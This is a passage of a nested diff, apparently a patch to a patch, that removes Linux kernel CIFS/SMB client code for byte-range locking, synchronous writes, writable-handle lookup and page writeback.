+-	bool posix_lck = false;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	__u32 type;
+-
+-	rc = -EACCES;
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "%s: %pD2 cmd=0x%x type=0x%x flags=0x%x r=%lld:%lld\n", __func__, file, cmd,
+-		 flock->fl_flags, flock->fl_type, (long long)flock->fl_start,
+-		 (long long)flock->fl_end);
+-
+-	cfile = (struct cifsFileInfo *)file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	cifs_read_flock(flock, &type, &lock, &unlock, &wait_flag,
+-			tcon->ses->server);
+-	cifs_sb = CIFS_FILE_SB(file);
+-	set_bit(CIFS_INO_CLOSE_ON_LOCK, &CIFS_I(d_inode(cfile->dentry))->flags);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		posix_lck = true;
+-	/*
+-	 * BB add code here to normalize offset and length to account for
+-	 * negative length which we can not accept over the wire.
+-	 */
+-	if (IS_GETLK(cmd)) {
+-		rc = cifs_getlk(file, flock, type, wait_flag, posix_lck, xid);
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	if (!lock && !unlock) {
+-		/*
+-		 * if no lock or unlock then nothing to do since we do not
+-		 * know what it is
+-		 */
+-		free_xid(xid);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	rc = cifs_setlk(file, flock, type, wait_flag, posix_lck, lock, unlock,
+-			xid);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/*
+- * update the file size (if needed) after a write. Should be called with
+- * the inode->i_lock held
+- */
+-void
+-cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
+-		      unsigned int bytes_written)
+-{
+-	loff_t end_of_write = offset + bytes_written;
+-
+-	if (end_of_write > cifsi->server_eof)
+-		cifsi->server_eof = end_of_write;
+-}
+-
+-static ssize_t
+-cifs_write(struct cifsFileInfo *open_file, __u32 pid, const char *write_data,
+-	   size_t write_size, loff_t *offset)
+-{
+-	int rc = 0;
+-	unsigned int bytes_written = 0;
+-	unsigned int total_written;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	unsigned int xid;
+-	struct dentry *dentry = open_file->dentry;
+-	struct cifsInodeInfo *cifsi = CIFS_I(d_inode(dentry));
+-	struct cifs_io_parms io_parms = {0};
+-
+-	cifs_dbg(FYI, "write %zd bytes to offset %lld of %pd\n",
+-		 write_size, *offset, dentry);
+-
+-	tcon = tlink_tcon(open_file->tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->sync_write)
+-		return -ENOSYS;
+-
+-	xid = get_xid();
+-
+-	for (total_written = 0; write_size > total_written;
+-	     total_written += bytes_written) {
+-		rc = -EAGAIN;
+-		while (rc == -EAGAIN) {
+-			struct kvec iov[2];
+-			unsigned int len;
+-
+-			if (open_file->invalidHandle) {
+-				/* we could deadlock if we called
+-				   filemap_fdatawait from here so tell
+-				   reopen_file not to flush data to
+-				   server now */
+-				rc = cifs_reopen_file(open_file, false);
+-				if (rc != 0)
+-					break;
+-			}
+-
+-			len = min(server->ops->wp_retry_size(d_inode(dentry)),
+-				  (unsigned int)write_size - total_written);
+-			/* iov[0] is reserved for smb header */
+-			iov[1].iov_base = (char *)write_data + total_written;
+-			iov[1].iov_len = len;
+-			io_parms.pid = pid;
+-			io_parms.tcon = tcon;
+-			io_parms.offset = *offset;
+-			io_parms.length = len;
+-			rc = server->ops->sync_write(xid, &open_file->fid,
+-					&io_parms, &bytes_written, iov, 1);
+-		}
+-		if (rc || (bytes_written == 0)) {
+-			if (total_written)
+-				break;
+-			else {
+-				free_xid(xid);
+-				return rc;
+-			}
+-		} else {
+-			spin_lock(&d_inode(dentry)->i_lock);
+-			cifs_update_eof(cifsi, *offset, bytes_written);
+-			spin_unlock(&d_inode(dentry)->i_lock);
+-			*offset += bytes_written;
+-		}
+-	}
+-
+-	cifs_stats_bytes_written(tcon, total_written);
+-
+-	if (total_written > 0) {
+-		spin_lock(&d_inode(dentry)->i_lock);
+-		if (*offset > d_inode(dentry)->i_size) {
+-			i_size_write(d_inode(dentry), *offset);
+-			d_inode(dentry)->i_blocks = (512 - 1 + *offset) >> 9;
+-		}
+-		spin_unlock(&d_inode(dentry)->i_lock);
+-	}
+-	mark_inode_dirty_sync(d_inode(dentry));
+-	free_xid(xid);
+-	return total_written;
+-}
+-
+-struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *cifs_inode,
+-					bool fsuid_only)
+-{
+-	struct cifsFileInfo *open_file = NULL;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
+-
+-	/* only filter by fsuid on multiuser mounts */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		fsuid_only = false;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-	/* we could simply get the first_list_entry since write-only entries
+-	   are always at the end of the list but since the first entry might
+-	   have a close pending, we go through the whole list */
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
+-			continue;
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_READ) {
+-			if ((!open_file->invalidHandle)) {
+-				/* found a good file */
+-				/* lock it so it will not be closed on us */
+-				cifsFileInfo_get(open_file);
+-				spin_unlock(&cifs_inode->open_file_lock);
+-				return open_file;
+-			} /* else might as well continue, and look for
+-			     another, or simply have the caller reopen it
+-			     again rather than trying to fix this handle */
+-		} else /* write only file */
+-			break; /* write only files are last so must be done */
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-	return NULL;
+-}
+-
+-/* Return -EBADF if no handle is found and general rc otherwise */
+-int
+-cifs_get_writable_file(struct cifsInodeInfo *cifs_inode, int flags,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *open_file, *inv_file = NULL;
+-	struct cifs_sb_info *cifs_sb;
+-	bool any_available = false;
+-	int rc = -EBADF;
+-	unsigned int refind = 0;
+-	bool fsuid_only = flags & FIND_WR_FSUID_ONLY;
+-	bool with_delete = flags & FIND_WR_WITH_DELETE;
+-	*ret_file = NULL;
+-
+-	/*
+-	 * Having a null inode here (because mapping->host was set to zero by
+-	 * the VFS or MM) should not happen but we had reports of on oops (due
+-	 * to it being zero) during stress testcases so we need to check for it
+-	 */
+-
+-	if (cifs_inode == NULL) {
+-		cifs_dbg(VFS, "Null inode passed to cifs_writeable_file\n");
+-		dump_stack();
+-		return rc;
+-	}
+-
+-	cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
+-
+-	/* only filter by fsuid on multiuser mounts */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		fsuid_only = false;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-refind_writable:
+-	if (refind > MAX_REOPEN_ATT) {
+-		spin_unlock(&cifs_inode->open_file_lock);
+-		return rc;
+-	}
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (!any_available && open_file->pid != current->tgid)
+-			continue;
+-		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
+-			continue;
+-		if (with_delete && !(open_file->fid.access & DELETE))
+-			continue;
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
+-			if (!open_file->invalidHandle) {
+-				/* found a good writable file */
+-				cifsFileInfo_get(open_file);
+-				spin_unlock(&cifs_inode->open_file_lock);
+-				*ret_file = open_file;
+-				return 0;
+-			} else {
+-				if (!inv_file)
+-					inv_file = open_file;
+-			}
+-		}
+-	}
+-	/* couldn't find useable FH with same pid, try any available */
+-	if (!any_available) {
+-		any_available = true;
+-		goto refind_writable;
+-	}
+-
+-	if (inv_file) {
+-		any_available = false;
+-		cifsFileInfo_get(inv_file);
+-	}
+-
+-	spin_unlock(&cifs_inode->open_file_lock);
+-
+-	if (inv_file) {
+-		rc = cifs_reopen_file(inv_file, false);
+-		if (!rc) {
+-			*ret_file = inv_file;
+-			return 0;
+-		}
+-
+-		spin_lock(&cifs_inode->open_file_lock);
+-		list_move_tail(&inv_file->flist, &cifs_inode->openFileList);
+-		spin_unlock(&cifs_inode->open_file_lock);
+-		cifsFileInfo_put(inv_file);
+-		++refind;
+-		inv_file = NULL;
+-		spin_lock(&cifs_inode->open_file_lock);
+-		goto refind_writable;
+-	}
+-
+-	return rc;
+-}
+-
+-struct cifsFileInfo *
+-find_writable_file(struct cifsInodeInfo *cifs_inode, int flags)
+-{
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	rc = cifs_get_writable_file(cifs_inode, flags, &cfile);
+-	if (rc)
+-		cifs_dbg(FYI, "Couldn't find writable handle rc=%d\n", rc);
+-
+-	return cfile;
+-}
+-
+-int
+-cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
+-		       int flags,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *cfile;
+-	void *page = alloc_dentry_path();
+-
+-	*ret_file = NULL;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		struct cifsInodeInfo *cinode;
+-		const char *full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (IS_ERR(full_path)) {
+-			spin_unlock(&tcon->open_file_lock);
+-			free_dentry_path(page);
+-			return PTR_ERR(full_path);
+-		}
+-		if (strcmp(full_path, name))
+-			continue;
+-
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-		spin_unlock(&tcon->open_file_lock);
+-		free_dentry_path(page);
+-		return cifs_get_writable_file(cinode, flags, ret_file);
+-	}
+-
+-	spin_unlock(&tcon->open_file_lock);
+-	free_dentry_path(page);
+-	return -ENOENT;
+-}
+-
+-int
+-cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *cfile;
+-	void *page = alloc_dentry_path();
+-
+-	*ret_file = NULL;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		struct cifsInodeInfo *cinode;
+-		const char *full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (IS_ERR(full_path)) {
+-			spin_unlock(&tcon->open_file_lock);
+-			free_dentry_path(page);
+-			return PTR_ERR(full_path);
+-		}
+-		if (strcmp(full_path, name))
+-			continue;
+-
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-		spin_unlock(&tcon->open_file_lock);
+-		free_dentry_path(page);
+-		*ret_file = find_readable_file(cinode, 0);
+-		return *ret_file ? 0 : -ENOENT;
+-	}
+-
+-	spin_unlock(&tcon->open_file_lock);
+-	free_dentry_path(page);
+-	return -ENOENT;
+-}
+-
+-void
+-cifs_writedata_release(struct kref *refcount)
+-{
+-	struct cifs_writedata *wdata = container_of(refcount,
+-					struct cifs_writedata, refcount);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (wdata->mr) {
+-		smbd_deregister_mr(wdata->mr);
+-		wdata->mr = NULL;
+-	}
+-#endif
+-
+-	if (wdata->cfile)
+-		cifsFileInfo_put(wdata->cfile);
+-
+-	kvfree(wdata->pages);
+-	kfree(wdata);
+-}
+-
+-/*
+- * Write failed with a retryable error. Resend the write request. It's also
+- * possible that the page was redirtied so re-clean the page.
+- */
+-static void
+-cifs_writev_requeue(struct cifs_writedata *wdata)
+-{
+-	int i, rc = 0;
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	struct TCP_Server_Info *server;
+-	unsigned int rest_len;
+-
+-	server = tlink_tcon(wdata->cfile->tlink)->ses->server;
+-	i = 0;
+-	rest_len = wdata->bytes;
+-	do {
+-		struct cifs_writedata *wdata2;
+-		unsigned int j, nr_pages, wsize, tailsz, cur_len;
+-
+-		wsize = server->ops->wp_retry_size(inode);
+-		if (wsize < rest_len) {
+-			nr_pages = wsize / PAGE_SIZE;
+-			if (!nr_pages) {
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cur_len = nr_pages * PAGE_SIZE;
+-			tailsz = PAGE_SIZE;
+-		} else {
+-			nr_pages = DIV_ROUND_UP(rest_len, PAGE_SIZE);
+-			cur_len = rest_len;
+-			tailsz = rest_len - (nr_pages - 1) * PAGE_SIZE;
+-		}
+-
+-		wdata2 = cifs_writedata_alloc(nr_pages, cifs_writev_complete);
+-		if (!wdata2) {
+-			rc = -ENOMEM;
+-			break;
+-		}
+-
+-		for (j = 0; j < nr_pages; j++) {
+-			wdata2->pages[j] = wdata->pages[i + j];
+-			lock_page(wdata2->pages[j]);
+-			clear_page_dirty_for_io(wdata2->pages[j]);
+-		}
+-
+-		wdata2->sync_mode = wdata->sync_mode;
+-		wdata2->nr_pages = nr_pages;
+-		wdata2->offset = page_offset(wdata2->pages[0]);
+-		wdata2->pagesz = PAGE_SIZE;
+-		wdata2->tailsz = tailsz;
+-		wdata2->bytes = cur_len;
+-
+-		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY,
+-					    &wdata2->cfile);
+-		if (!wdata2->cfile) {
+-			cifs_dbg(VFS, "No writable handle to retry writepages rc=%d\n",
+-				 rc);
+-			if (!is_retryable_error(rc))
+-				rc = -EBADF;
+-		} else {
+-			wdata2->pid = wdata2->cfile->pid;
+-			rc = server->ops->async_writev(wdata2,
+-						       cifs_writedata_release);
+-		}
+-
+-		for (j = 0; j < nr_pages; j++) {
+-			unlock_page(wdata2->pages[j]);
+-			if (rc != 0 && !is_retryable_error(rc)) {
+-				SetPageError(wdata2->pages[j]);
+-				end_page_writeback(wdata2->pages[j]);
+-				put_page(wdata2->pages[j]);
+-			}
+-		}
+-
+-		kref_put(&wdata2->refcount, cifs_writedata_release);
+-		if (rc) {
+-			if (is_retryable_error(rc))
+-				continue;
+-			i += nr_pages;
+-			break;
+-		}
+-
+-		rest_len -= cur_len;
+-		i += nr_pages;
+-	} while (i < wdata->nr_pages);
+-
+-	/* cleanup remaining pages from the original wdata */
+-	for (; i < wdata->nr_pages; i++) {
+-		SetPageError(wdata->pages[i]);
+-		end_page_writeback(wdata->pages[i]);
+-		put_page(wdata->pages[i]);
+-	}
+-
+-	if (rc != 0 && !is_retryable_error(rc))
+-		mapping_set_error(inode->i_mapping, rc);
+-	kref_put(&wdata->refcount, cifs_writedata_release);
+-}
+-
+-void
+-cifs_writev_complete(struct work_struct *work)
+-{
+-	struct cifs_writedata *wdata = container_of(work,
+-						struct cifs_writedata, work);
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	int i = 0;
+-
+-	if (wdata->result == 0) {
+-		spin_lock(&inode->i_lock);
+-		cifs_update_eof(CIFS_I(inode), wdata->offset, wdata->bytes);
+-		spin_unlock(&inode->i_lock);
+-		cifs_stats_bytes_written(tlink_tcon(wdata->cfile->tlink),
+-					 wdata->bytes);
+-	} else if (wdata->sync_mode == WB_SYNC_ALL && wdata->result == -EAGAIN)
+-		return cifs_writev_requeue(wdata);
+-
+-	for (i = 0; i < wdata->nr_pages; i++) {
+-		struct page *page = wdata->pages[i];
+-
+-		if (wdata->result == -EAGAIN)
+-			__set_page_dirty_nobuffers(page);
+-		else if (wdata->result < 0)
+-			SetPageError(page);
+-		end_page_writeback(page);
+-		cifs_readpage_to_fscache(inode, page);
+-		put_page(page);
+-	}
+-	if (wdata->result != -EAGAIN)
+-		mapping_set_error(inode->i_mapping, wdata->result);
+-	kref_put(&wdata->refcount, cifs_writedata_release);
+-}
+-
+-struct cifs_writedata *
+-cifs_writedata_alloc(unsigned int nr_pages, work_func_t complete)
+-{
+-	struct cifs_writedata *writedata = NULL;
+-	struct page **pages =
+-		kcalloc(nr_pages, sizeof(struct page *), GFP_NOFS);
+-	if (pages) {
+-		writedata = cifs_writedata_direct_alloc(pages, complete);
+-		if (!writedata)
+-			kvfree(pages);
+-	}
+-
+-	return writedata;
+-}
+-
+-struct cifs_writedata *
+-cifs_writedata_direct_alloc(struct page **pages, work_func_t complete)
+-{
+-	struct cifs_writedata *wdata;
+-
+-	wdata = kzalloc(sizeof(*wdata), GFP_NOFS);
+-	if (wdata != NULL) {
+-		wdata->pages = pages;
+-		kref_init(&wdata->refcount);
+-		INIT_LIST_HEAD(&wdata->list);
+-		init_completion(&wdata->done);
+-		INIT_WORK(&wdata->work, complete);
+-	}
+-	return wdata;
+-}
+-
+-
+-static int cifs_partialpagewrite(struct page *page, unsigned from, unsigned to)
+-{
+-	struct address_space *mapping = page->mapping;
+-	loff_t offset = (loff_t)page->index << PAGE_SHIFT;
+-	char *write_data;
+-	int rc = -EFAULT;
+-	int bytes_written = 0;
+-	struct inode *inode;
+-	struct cifsFileInfo *open_file;
+-
+-	if (!mapping || !mapping->host)
+-		return -EFAULT;
+-
+-	inode = page->mapping->host;
+-
+-	offset += (loff_t)from;
+-	write_data = kmap(page);
+-	write_data += from;
+-
+-	if ((to > PAGE_SIZE) || (from > to)) {
+-		kunmap(page);
+-		return -EIO;
+-	}
+-
+-	/* racing with truncate? */
+-	if (offset > mapping->host->i_size) {
+-		kunmap(page);
+-		return 0; /* don't care */
+-	}
+-
+-	/* check to make sure that we are not extending the file */
+-	if (mapping->host->i_size - offset < (loff_t)to)
+-		to = (unsigned)(mapping->host->i_size - offset);
+-
+-	rc = cifs_get_writable_file(CIFS_I(mapping->host), FIND_WR_ANY,
+-				    &open_file);
+-	if (!rc) {
+-		bytes_written = cifs_write(open_file, open_file->pid,
+-					   write_data, to - from, &offset);
+-		cifsFileInfo_put(open_file);
+-		/* Does mm or vfs already set times? */
+-		inode->i_atime = inode->i_mtime = current_time(inode);
+-		if ((bytes_written > 0) && (offset))
+-			rc = 0;
+-		else if (bytes_written < 0)
+-			rc = bytes_written;
+-		else
+-			rc = -EFAULT;
+-	} else {
+-		cifs_dbg(FYI, "No writable handle for write page rc=%d\n", rc);
+-		if (!is_retryable_error(rc))
+-			rc = -EIO;
+-	}
+-
+-	kunmap(page);
+-	return rc;
+-}
+-
+-static struct cifs_writedata *
+-wdata_alloc_and_fillpages(pgoff_t tofind, struct address_space *mapping,
+-			  pgoff_t end, pgoff_t *index,
+-			  unsigned int *found_pages)
+-{
+-	struct cifs_writedata *wdata;
+-
+-	wdata = cifs_writedata_alloc((unsigned int)tofind,
+-				     cifs_writev_complete);
+-	if (!wdata)
+-		return NULL;
+-
+-	*found_pages = find_get_pages_range_tag(mapping, index, end,
+-				PAGECACHE_TAG_DIRTY, tofind, wdata->pages);
+-	return wdata;
+-}
+-
+-static unsigned int
+-wdata_prepare_pages(struct cifs_writedata *wdata, unsigned int found_pages,
+-		    struct address_space *mapping,
+-		    struct writeback_control *wbc,
+-		    pgoff_t end, pgoff_t *index, pgoff_t *next, bool *done)
+-{
+-	unsigned int nr_pages = 0, i;
+-	struct page *page;
+-
+-	for (i = 0; i < found_pages; i++) {
+-		page = wdata->pages[i];
+-		/*
+-		 * At this point we hold neither the i_pages lock nor the
+-		 * page lock: the page may be truncated or invalidated
+-		 * (changing page->mapping to NULL), or even swizzled
+-		 * back from swapper_space to tmpfs file mapping
+-		 */
+-
+-		if (nr_pages == 0)
+-			lock_page(page);
+-		else if (!trylock_page(page))
+-			break;
+-
+-		if (unlikely(page->mapping != mapping)) {
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (!wbc->range_cyclic && page->index > end) {
+-			*done = true;
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (*next && (page->index != *next)) {
+-			/* Not next consecutive page */
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (wbc->sync_mode != WB_SYNC_NONE)
+-			wait_on_page_writeback(page);
+-
+-		if (PageWriteback(page) ||
+-				!clear_page_dirty_for_io(page)) {
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		/*
+-		 * This actually clears the dirty bit in the radix tree.
+-		 * See cifs_writepage() for more commentary.
+-		 */
+-		set_page_writeback(page);
+-		if (page_offset(page) >= i_size_read(mapping->host)) {
+-			*done = true;
+-			unlock_page(page);
+-			end_page_writeback(page);
+-			break;
+-		}
+-
+-		wdata->pages[i] = page;
+-		*next = page->index + 1;
+-		++nr_pages;
+-	}
+-
+-	/* reset index to refind any pages skipped */
+-	if (nr_pages == 0)
+-		*index = wdata->pages[0]->index + 1;
+-
+-	/* put any pages we aren't going to use */
+-	for (i = nr_pages; i < found_pages; i++) {
+-		put_page(wdata->pages[i]);
+-		wdata->pages[i] = NULL;
+-	}
+-
+-	return nr_pages;
+-}
+-
+-static int
+-wdata_send_pages(struct cifs_writedata *wdata, unsigned int nr_pages,
+-		 struct address_space *mapping, struct writeback_control *wbc)
+-{
+-	int rc;
+-
+-	wdata->sync_mode = wbc->sync_mode;
+-	wdata->nr_pages = nr_pages;
+-	wdata->offset = page_offset(wdata->pages[0]);
+-	wdata->pagesz = PAGE_SIZE;
+-	wdata->tailsz = min(i_size_read(mapping->host) -
+-			page_offset(wdata->pages[nr_pages - 1]),
+-			(loff_t)PAGE_SIZE);
+-	wdata->bytes = ((nr_pages - 1) * PAGE_SIZE) + wdata->tailsz;
+-	wdata->pid = wdata->cfile->pid;
+-
+-	rc = adjust_credits(wdata->server, &wdata->credits, wdata->bytes);
+-	if (rc)
+-		return rc;
+-
+-	if (wdata->cfile->invalidHandle)
+-		rc = -EAGAIN;
+-	else
+-		rc = wdata->server->ops->async_writev(wdata,
+-						      cifs_writedata_release);
+-
+-	return rc;
+-}
+-
+-static int cifs_writepages(struct address_space *mapping,
+-			   struct writeback_control *wbc)
+-{
+-	struct inode *inode = mapping->host;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct TCP_Server_Info *server;
+-	bool done = false, scanned = false, range_whole = false;
+-	pgoff_t end, index;
+-	struct cifs_writedata *wdata;
+-	struct cifsFileInfo *cfile = NULL;
+-	int rc = 0;
+-	int saved_rc = 0;
+-	unsigned int xid;
+-
+-	/*
+-	 * If wsize is smaller than the page cache size, default to writing
+-	 * one page at a time via cifs_writepage
+-	 */
+-	if (cifs_sb->ctx->wsize < PAGE_SIZE)
+-		return generic_writepages(mapping, wbc);
+-
+-	xid = get_xid();
+-	if (wbc->range_cyclic) {
+-		index = mapping->writeback_index; /* Start from prev offset */
+-		end = -1;
+-	} else {
+-		index = wbc->range_start >> PAGE_SHIFT;
+-		end = wbc->range_end >> PAGE_SHIFT;
+-		if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
+-			range_whole = true;
+-		scanned = true;
+-	}
+-	server = cifs_pick_channel(cifs_sb_master_tcon(cifs_sb)->ses);
+-
+-retry:
+-	while (!done && index <= end) {
+-		unsigned int i, nr_pages, found_pages, wsize;
+-		pgoff_t next = 0, tofind, saved_index = index;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-		int get_file_rc = 0;
+-
+-		if (cfile)
+-			cifsFileInfo_put(cfile);
+-
+-		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY, &cfile);
+-
+-		/* in case of an error store it to return later */
+-		if (rc)
+-			get_file_rc = rc;
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
+-						   &wsize, credits);
+-		if (rc != 0) {
+-			done = true;
+-			break;
+-		}
+-
+-		tofind = min((wsize / PAGE_SIZE) - 1, end - index) + 1;
+-
+-		wdata = wdata_alloc_and_fillpages(tofind, mapping, end, &index,
+-						  &found_pages);
+-		if (!wdata) {
+-			rc = -ENOMEM;
+-			done = true;
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		if (found_pages == 0) {
+-			kref_put(&wdata->refcount, cifs_writedata_release);
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		nr_pages = wdata_prepare_pages(wdata, found_pages, mapping, wbc,
+-					       end, &index, &next, &done);
+-
+-		/* nothing to write? */
+-		if (nr_pages == 0) {
+-			kref_put(&wdata->refcount, cifs_writedata_release);
+-			add_credits_and_wake_if(server, credits, 0);
+-			continue;
+-		}
+-
+-		wdata->credits = credits_on_stack;
+-		wdata->cfile = cfile;
+-		wdata->server = server;
+-		cfile = NULL;
+-
+-		if (!wdata->cfile) {
+-			cifs_dbg(VFS, "No writable handle in writepages rc=%d\n",
+-				 get_file_rc);
+-			if (is_retryable_error(get_file_rc))
+-				rc = get_file_rc;
+-			else
+-				rc = -EBADF;
+-		} else
+-			rc = wdata_send_pages(wdata, nr_pages, mapping, wbc);
+-
+-		for (i = 0; i < nr_pages; ++i)
+-			unlock_page(wdata->pages[i]);
+-
+-		/* send failure -- clean up the mess */
+-		if (rc != 0) {
+-			add_credits_and_wake_if(server, &wdata->credits, 0);
+-			for (i = 0; i < nr_pages; ++i) {
+-				if (is_retryable_error(rc))
+-					redirty_page_for_writepage(wbc,
+-							   wdata->pages[i]);
+-				else
+-					SetPageError(wdata->pages[i]);
+-				end_page_writeback(wdata->pages[i]);
+-				put_page(wdata->pages[i]);
+-			}
+-			if (!is_retryable_error(rc))
+-				mapping_set_error(mapping, rc);
+-		}
+-		kref_put(&wdata->refcount, cifs_writedata_release);
+-
+-		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN) {
+-			index = saved_index;
+-			continue;
+-		}
+-
+-		/* Return immediately if we received a signal during writing */
+-		if (is_interrupt_error(rc)) {
+-			done = true;
+-			break;
+-		}
+-
+-		if (rc != 0 && saved_rc == 0)
+-			saved_rc = rc;
+-
+-		wbc->nr_to_write -= nr_pages;
+-		if (wbc->nr_to_write <= 0)
+-			done = true;
+-
+-		index = next;
+-	}
+-
+-	if (!scanned && !done) {
+-		/*
+-		 * We hit the last page and there is more work to be done: wrap
+-		 * back to the start of the file
+-		 */
+-		scanned = true;
+-		index = 0;
+-		goto retry;
+-	}
+-
+-	if (saved_rc != 0)
+-		rc = saved_rc;
+-
+-	if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
+-		mapping->writeback_index = index;
+-
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-	free_xid(xid);
+-	/* Indication to update ctime and mtime as close is deferred */
+-	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
+-	return rc;
+-}
+-
+-static int
+-cifs_writepage_locked(struct page *page, struct writeback_control *wbc)
+-{
+-	int rc;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-/* BB add check for wbc flags */
+-	get_page(page);
+-	if (!PageUptodate(page))
+-		cifs_dbg(FYI, "ppw - page not up to date\n");
+-
+-	/*
+-	 * Set the "writeback" flag, and clear "dirty" in the radix tree.
+-	 *
+-	 * A writepage() implementation always needs to do either this,
+-	 * or re-dirty the page with "redirty_page_for_writepage()" in
+-	 * the case of a failure.
+-	 *
+-	 * Just unlocking the page will cause the radix tree tag-bits
+-	 * to fail to update with the state of the page correctly.
+-	 */
+-	set_page_writeback(page);
+-retry_write:
+-	rc = cifs_partialpagewrite(page, 0, PAGE_SIZE);
+-	if (is_retryable_error(rc)) {
+-		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN)
+-			goto retry_write;
+-		redirty_page_for_writepage(wbc, page);
+-	} else if (rc != 0) {
+-		SetPageError(page);
+-		mapping_set_error(page->mapping, rc);
+-	} else {
+-		SetPageUptodate(page);
+-	}
+-	end_page_writeback(page);
+-	put_page(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int cifs_writepage(struct page *page, struct writeback_control *wbc)
+-{
+-	int rc = cifs_writepage_locked(page, wbc);
+-	unlock_page(page);
+-	return rc;
+-}
+-
+-static int cifs_write_end(struct file *file, struct address_space *mapping,
+-			loff_t pos, unsigned len, unsigned copied,
+-			struct page *page, void *fsdata)
+-{
+-	int rc;
+-	struct inode *inode = mapping->host;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-	__u32 pid;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = cfile->pid;
+-	else
+-		pid = current->tgid;
+-
+-	cifs_dbg(FYI, "write_end for page %p from pos %lld with %d bytes\n",
+-		 page, pos, copied);
+-
+-	if (PageChecked(page)) {
+-		if (copied == len)
+-			SetPageUptodate(page);
+-		ClearPageChecked(page);
+-	} else if (!PageUptodate(page) && copied == PAGE_SIZE)
+-		SetPageUptodate(page);
+-
+-	if (!PageUptodate(page)) {
+-		char *page_data;
+-		unsigned offset = pos & (PAGE_SIZE - 1);
+-		unsigned int xid;
+-
+-		xid = get_xid();
+-		/* this is probably better than directly calling
+-		   partialpage_write since in this function the file handle is
+-		   known which we might as well	leverage */
+-		/* BB check if anything else missing out of ppw
+-		   such as updating last write time */
+-		page_data = kmap(page);
+-		rc = cifs_write(cfile, pid, page_data + offset, copied, &pos);
+-		/* if (rc < 0) should we set writebehind rc? */
+-		kunmap(page);
+-
+-		free_xid(xid);
+-	} else {
+-		rc = copied;
+-		pos += copied;
+-		set_page_dirty(page);
+-	}
+-
+-	if (rc > 0) {
+-		spin_lock(&inode->i_lock);
+-		if (pos > inode->i_size) {
+-			i_size_write(inode, pos);
+-			inode->i_blocks = (512 - 1 + pos) >> 9;
+-		}
+-		spin_unlock(&inode->i_lock);
+-	}
+-
+-	unlock_page(page);
+-	put_page(page);
+-	/* Indication to update ctime and mtime as close is deferred */
+-	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
+-
+-	return rc;
+-}
+-
